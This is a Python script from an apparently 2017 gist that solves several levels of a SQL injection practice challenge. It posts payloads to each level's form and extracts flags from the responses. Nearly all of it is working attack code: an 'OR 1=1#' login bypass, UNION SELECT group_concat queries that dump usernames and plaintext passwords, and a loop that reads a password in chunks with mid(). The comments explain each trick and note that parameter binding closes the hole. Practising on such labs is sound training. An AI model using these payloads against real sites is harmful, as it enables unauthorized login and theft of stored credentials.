@abdilahrf
Created September 23, 2017 13:22
Solution for sqli level 1-6 except 5
import requests
import re
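# GLOBAL
# Walk-through of the SQL injection practice levels db01-db06 (level 5 is
# not solved here).  Every payload below only works if the page pastes the
# submitted form field straight into its SQL text; binding the field as a
# query parameter (prepared statement) closes all of them.
# Written so that it runs unchanged on Python 2 and Python 3.
base_url = "http://mezzanine.mysterious-hashes.net/"
format_flag = "flag{%s}"
# Seconds to wait for the server; without a timeout requests can block forever.
REQUEST_TIMEOUT = 10


def _post(page, fields):
    """POST the form *fields* to *page* under base_url and return the body text."""
    return requests.post(base_url + page, data=fields,
                         timeout=REQUEST_TIMEOUT).text


def _capture(pattern, body, page):
    """Return group 1 of *pattern* found in *body*.

    Raises ValueError naming *page* when the response does not match, instead
    of the bare AttributeError that ``re.search(...).group(1)`` gives on None.
    """
    found = re.search(pattern, body)
    if found is None:
        raise ValueError("%s: response did not match %r" % (page, pattern))
    return found.group(1)


# LEVEL 1
# Login form: the quote ends the string literal, "OR 1=1" makes the WHERE
# clause always true and "#" comments out the rest of the statement.
payload = {
    "user": "' OR 1=1#",
    "pass": "' OR 1=1#"
}
result = _post("db01.php", payload)
flag = _capture("flag{(.*)}", result, "db01.php")
print("Level1 : " + format_flag % flag)

# LEVEL 2
# Same tautology with "limit 1" appended; presumably this page checks how
# many rows come back -- not visible from here.
payload = {
    "user": "' OR 1=1 limit 1#",
    "pass": "' OR 1=1 limit 1#"
}
result = _post("db02.php", payload)
flag = _capture("flag{(.*)}", result, "db02.php")
print("Level2 : " + format_flag % flag)

# LEVEL 3
# UNION-based: the page echoes the selected value inside "user '...'", so a
# second SELECT appended to the query is reflected in the response.  Not
# echoing query output would have hidden the data, but only parameter
# binding removes the flaw.
payload = {
    "user": "' UNION SELECT group_concat(user) from user#"
}
result = _post("db03.php", payload)
# The flag is the second entry of the comma-separated user list.
flag = _capture("user '(.*)'", result, "db03.php").split(",")[1]
print("Level3 : " + format_flag % flag)

# LEVEL 4
# Same reflection, now returning user:pass pairs (0x3a is ':').  The pass
# column comes back readable, which points at passwords stored unhashed.
payload = {
    "user": "' UNION SELECT group_concat(user,0x3a,pass) from user#"
}
result = _post("db04.php", payload)
# The flag is the password part of the first user:pass pair.
flag = _capture("user '(.*)'", result, "db04.php").split(",")[0].split(":")[1]
print("Level4 : " + format_flag % flag)

# LEVEL 5
print("Level5 : -")

# LEVEL 6
# The value is read back in eight-character steps (offsets 1, 9, ..., 57) and
# concatenated; presumably the page shows only a short slice of the selected
# value per request -- confirm against the challenge.
flag = ""
for x in range(1, 64, 8):
    payload = {
        "code": "foobar' UNION SELECT mid(pass,%d) from user#" % x
    }
    result = _post("db06.php", payload)
    flag += _capture("<li>(.*)</li>", result, "db06.php")
print("Level6 : " + format_flag % flag)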